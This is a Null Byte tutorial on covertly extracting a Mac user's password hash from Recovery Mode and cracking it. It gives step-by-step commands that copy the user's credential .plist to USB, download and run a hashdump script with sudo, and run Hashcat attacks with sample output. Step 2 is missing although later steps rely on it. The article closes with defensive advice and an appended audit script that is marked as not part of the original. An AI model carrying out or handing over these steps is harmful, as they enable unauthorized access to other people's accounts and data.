
How To Hack A Mac Password Without Changing It (Null Byte :: WonderHowTo)



A powered-off MacBook can be compromised in less than three minutes. With just a few commands, it is possible for an attacker to extract a target's password hash and crack it without their knowledge.

The objective of this article is to acquire the .plist file that contains the target's hashed password. A Python script then converts the .plist file into a format Hashcat can interpret, and the hash is brute-forced to reveal the password. The easiest way to perform this attack requires physical access to the target MacBook, Recovery Mode, a USB flash drive, another MacBook, and Hashcat.

You could also skip the USB flash drive and the attacker's MacBook by instead creating a temporary user on the target MacBook from which the commands can be run. The temporary user can then be deleted when finished. For this guide, however, we show the USB flash drive method.


Recovery Mode is one of several boot modes supported by Mac devices. It contains a number of tools to reinstall macOS, reset account passwords, and configure a firmware password. While this feature was designed to help users who are locked out of their accounts or who need to wipe the internal hard drive, it is often abused by attackers trying to gain unauthorized access to sensitive files.

Since Mojave 10.14, macOS no longer allows users (not even root) to change the .plist files that contain hashed passwords while the operating system is running. That data can now only be acquired from Recovery Mode.

The USB flash drive is required to move the target .plist file from the target MacBook to the attacker's machine. The USB flash drive used in this tutorial is FAT32 formatted, but NTFS and APFS formats will work as well.

The Python script uses some macOS-specific commands to convert the .plist file into a format Hashcat can interpret. Therefore, another MacBook (or at least some other macOS account) is required.

To recover the target's Mac password without changing it, the hash must be brute-forced and cracked. macOS does an excellent job of securing the password: user passwords cannot be viewed in plain text. CPU-based cracking solutions (like John the Ripper) would literally take decades to crack a single hash and are therefore not effective. Hashcat with a decent GPU is highly recommended.

Step 1: Enter Recovery Mode

To access Recovery Mode, first make sure the target MacBook is powered off completely. Then press the power button while holding Command + R on the keyboard. After about 30 seconds the Apple logo will appear, and the Command + R keys can be released. If the following screen appears, Recovery Mode has been entered and you can proceed to the next step in this guide.

Step 3: Extract the Target .plist

Insert the USB flash drive into the target MacBook. Wait a few seconds for it to mount automatically. Then copy the target .plist file to the USB device using the cp command below. The target .plist is named after the target's username (e.g., tokyoneon.plist).

  cp /Volumes/<hard drive name>/var/db/dslocal/nodes/Default/users/<username>.plist /Volumes/<usb name>/

Be sure to change <hard drive name> in the above command. This is likely to be "macOS", but it may be different if the target purchased the MacBook years ago and upgraded to Mojave or High Sierra. In that case, the hard drive name may appear as "Macintosh HD" or some variation. Also, change <username> to the target's username and <usb name> to the name of your USB flash drive.

That's it. The required file has been extracted, the target MacBook can be powered off, and the rest of the guide requires a separate MacBook owned by the attacker. If SIP was disabled in the previous step, enable it again before powering off, using the command below.

  csrutil enable 

Step 4: Copy the .plist to the Attacker's Machine

On the attacker's MacBook, insert the USB flash drive containing the .plist and copy (cp) the target .plist to the /tmp/ directory. The /tmp/ directory is hard-coded in the Python script used in the next step, to keep it generic enough for all readers to follow along. As long as the target .plist file is in the /tmp/ directory, the Python script will be able to convert it to a hash.

  cp /Volumes/<usb name>/<username>.plist /tmp/

Step 5: Download and Execute the Hashdump Python Script

The Python script used to convert the extracted .plist file into Hashcat's preferred format was taken from the Empire framework and is available on GitHub. Open a terminal and download the hashdump script with the curl command below. The -o argument saves the script with the filename "hashdump.py".

  curl https://raw.githubusercontent.com/tokyoneon/hashdump.py/master/hashdump.py -o hashdump.py

Give the script permission to execute with the chmod command.

  chmod +x hashdump.py

Finally, run the hashdump.py script with root privileges.

  sudo python hashdump.py

[('tokyoneon', '$ml$27548$ba6261885e349ecb847854136cf32e9561cd1af65616f7ce11abb3f04786729c$88ad7849c5b30cce20b9d6ecde9e5be3b6736646965e0414d45d40510a574f864bafd9c5dc06fdb3cb189b877c3aa1312c2e4497ea854d3653f5861365d41a4250042a78c93dace17d212ccbb6584e3350efe95bd138f27b1705ad97166d2f11fb749b6138139a9e1ebeecb1a96750db53dbf75434c4b320b500589fa64bf5f8')] 

Delete the text surrounding the hash (shown below) and save the hash to a file called "hash.txt". Next, move hash.txt to the Hashcat machine.

  $ml$27548$ba6261885e349ecb847854136cf32e9561cd1af65616f7ce11abb3f04786729c$88ad7849c5b30cce20b9d6ecde9e5be3b6736646965e0414d45d40510a574f864bafd9c5dc06fdb3cb189b877c3aa1312c2e4497ea854d3653f5861365d41a4250042a78c93dace17d212ccbb6584e3350efe95bd138f27b1705ad97166d2f11fb749b6138139a9e1ebeecb1a96750db53dbf75434c4b320b500589fa64bf5f8

Step 6: Crack the Hash

To crack the target hash, use the Hashcat command below.

  hashcat -a 0 -m 7100 /path/to/hash.txt /path/to/wordlists/passwords.txt -w 4 --potfile-path /tmp/cracked_hash.pot

The dictionary attack, or "straight mode", is specified with the -a 0 argument. The macOS-specific hashing mode is enabled with -m 7100 and is required for all macOS hashes extracted from version 10.8 or later. To improve Hashcat's overall performance, set -w (or --workload-profile) to 4 to maximize cracking speed. Finally, the --potfile-path argument saves the cracked hash to the specified file.

It is also possible to perform hybrid attacks, where numeric combinations are appended to the end of each word in the dictionary, for example "password12" and "password77".

  hashcat -a 6 -m 7100 /path/to/hash.txt /path/to/wordlists/everyword.txt ?d?d -w 4 --potfile-path /tmp/db.pot

The hybrid attack is activated with the -a 6 argument. This time, an "everyword" dictionary of 479,000 English words is used in combination with ?d?d, which tells Hashcat to append every possible two-digit combination to each word in the dictionary. To append three or four digits, use "?d?d?d" or "?d?d?d?d" respectively.

While Hashcat is running, the following status output is displayed. If the password is guessed correctly, it will appear at the bottom of the terminal and Hashcat will stop.

  Session..........: hashcat
  Status...........: Running
  Hash.Type........: macOS v10.8+ (PBKDF2-SHA512)
  Hash.Target......: $ml$27548$ba6261885e349ecb847854136cf32e9561cd1af65...d41a42
  Guess.Base.......: File (/root/wordlists/passwords.txt)
  Guess.Queue......: 1/1 (100.00%)
  Speed.Dev.#1.....: 7740 H/s (98.63ms) @ Accel:256 Loops:64 Thr:512 Vec:1
  Recovered........: 0/1 (0.00%) Digests, 0/1 (0.00%) Salts
  Progress.........: 0/329968 (0.00%)
  Rejected.........: 0/0 (0.00%)
  Restore.Point....: 0/329968 (0.00%)
  Candidates.#1....: 123456 -> zzzzzzzz9
  HWMon.Dev.#1.....: Temp: 57c Fan: 31% Util:100% Core:1873MHz Mem:3802MHz Bus:16

  [s]tatus [p]ause [b]ypass [c]heckpoint [q]uit =>

Hash Cracking Considerations

It is hard to predict how long a hash will take to crack. Dictionary and hybrid attacks can take a varying amount of time, depending on a few factors.

  • Hash iterations - Not all macOS hashes are created equal. Hash iterations are used as a slowdown factor, which forces the CPU or GPU to take significantly longer to compute a single password attempt. The number of iterations varied in my tests against Mojave and High Sierra. In some cases, iterations were set to 27,000; other times, over 45,000. Whether this value is random or specific to each version of macOS is not clear from my testing. One thing is certain: the higher this value, the longer Hashcat has to work to crack a single hash. Higher iterations can be the difference between 25,000 and only 1,000 password attempts per second. To identify the number of iterations used in the extracted .plist, take a look at the target's hash again (shown below). At the beginning of the hash, between the second and third dollar characters ($), the number of iterations (27,548) can be found.
  $ml$27548$ba6261885e...
  • GPU Model - With an old GeForce GTX 1060 graphics card and a hash with 27,548 iterations, it is possible to perform ~8,000 password attempts per second. The type of GPU used will drastically affect the overall performance of the attack. GPUs older than a GTX 750 Ti are not recommended.


How to Protect Yourself from Recovery Mode Attacks

There are a few things users can do to defend themselves against this kind of attack (see below). For general advice on protecting macOS, check out "The Ultimate Guide to Hacking macOS".

  • Enable a firmware password. To prevent an attacker from booting into a live USB, single-user mode, or Recovery Mode, set a firmware password. The firmware will only prompt for this additional password at startup if someone tries to boot the MacBook into single-user mode, Startup Manager, Target Disk Mode, or Recovery Mode. However, a firmware password alone does not protect the hard drive if the disk is physically removed from the MacBook. For more protection, enable disk encryption.
  • Enable FileVault encryption. FileVault can be enabled by navigating to "System Settings", then "Security and Privacy", and clicking "Turn on FileVault" (you may need to unlock the settings first). When done, the MacBook restarts and requires a password to unlock the computer every time the Mac starts. No account will be allowed to log in automatically, and access to single-user mode also requires a password. This is the best way to prevent attacks on the encrypted disk, even if it is physically removed from your laptop. A complex passphrase of over 21 characters is recommended to protect against attacks with dedicated cracking hardware.
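The following audit script is an added example, not part of the original article. It checks the two defenses recommended above plus SIP using the real macOS tools fdesetup, firmwarepasswd (which needs root) and csrutil; the parsing functions take each tool's output as an argument, so they can also be exercised on constructed sample output away from a Mac.

```sh
#!/bin/sh
# Added audit helper (not from the original article). Checks FileVault,
# firmware password and SIP; a non-zero exit count means the Mac is exposed
# to the Recovery Mode hash-extraction attack described in the article.

# Returns 0 when FileVault is on. Real output: "FileVault is On." / "FileVault is Off."
filevault_on() {
    case "$1" in
        *"FileVault is On"*) return 0 ;;
        *) return 1 ;;
    esac
}

# Returns 0 when a firmware password is set. Real output: "Password Enabled: Yes" / "... No"
firmware_password_set() {
    case "$1" in
        *"Password Enabled: Yes"*) return 0 ;;
        *) return 1 ;;
    esac
}

# Returns 0 when SIP is enabled. Real output: "System Integrity Protection status: enabled."
sip_enabled() {
    case "$1" in
        *"status: enabled"*) return 0 ;;
        *) return 1 ;;
    esac
}

# Takes the three tool outputs, prints one line per check, and returns the
# number of failed checks.
audit_mac_protections() {
    fails=0
    if filevault_on "$1"; then echo "[ok]   FileVault on: the disk, including the password .plist files, is encrypted at rest"
    else echo "[FAIL] FileVault off: Recovery Mode can read /var/db/dslocal/nodes/Default/users/*.plist"; fails=$((fails + 1)); fi
    if firmware_password_set "$2"; then echo "[ok]   Firmware password set: Recovery Mode and external boot require it"
    else echo "[FAIL] No firmware password: anyone holding the laptop can boot Recovery Mode with Command + R"; fails=$((fails + 1)); fi
    if sip_enabled "$3"; then echo "[ok]   SIP enabled"
    else echo "[FAIL] SIP disabled: was 'csrutil enable' run again after the last Recovery Mode session?"; fails=$((fails + 1)); fi
    return "$fails"
}

# Live run on a Mac: feed the parsers the real tool output (firmwarepasswd needs sudo).
if [ "$(uname)" = "Darwin" ]; then
    audit_mac_protections "$(fdesetup status 2>/dev/null)" \
                          "$(sudo firmwarepasswd -check 2>/dev/null)" \
                          "$(csrutil status 2>/dev/null)"
fi
```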


Cover photo by Wes Hicks/Unsplash; screenshots by tokyoneon/Null Byte (unless otherwise stated)
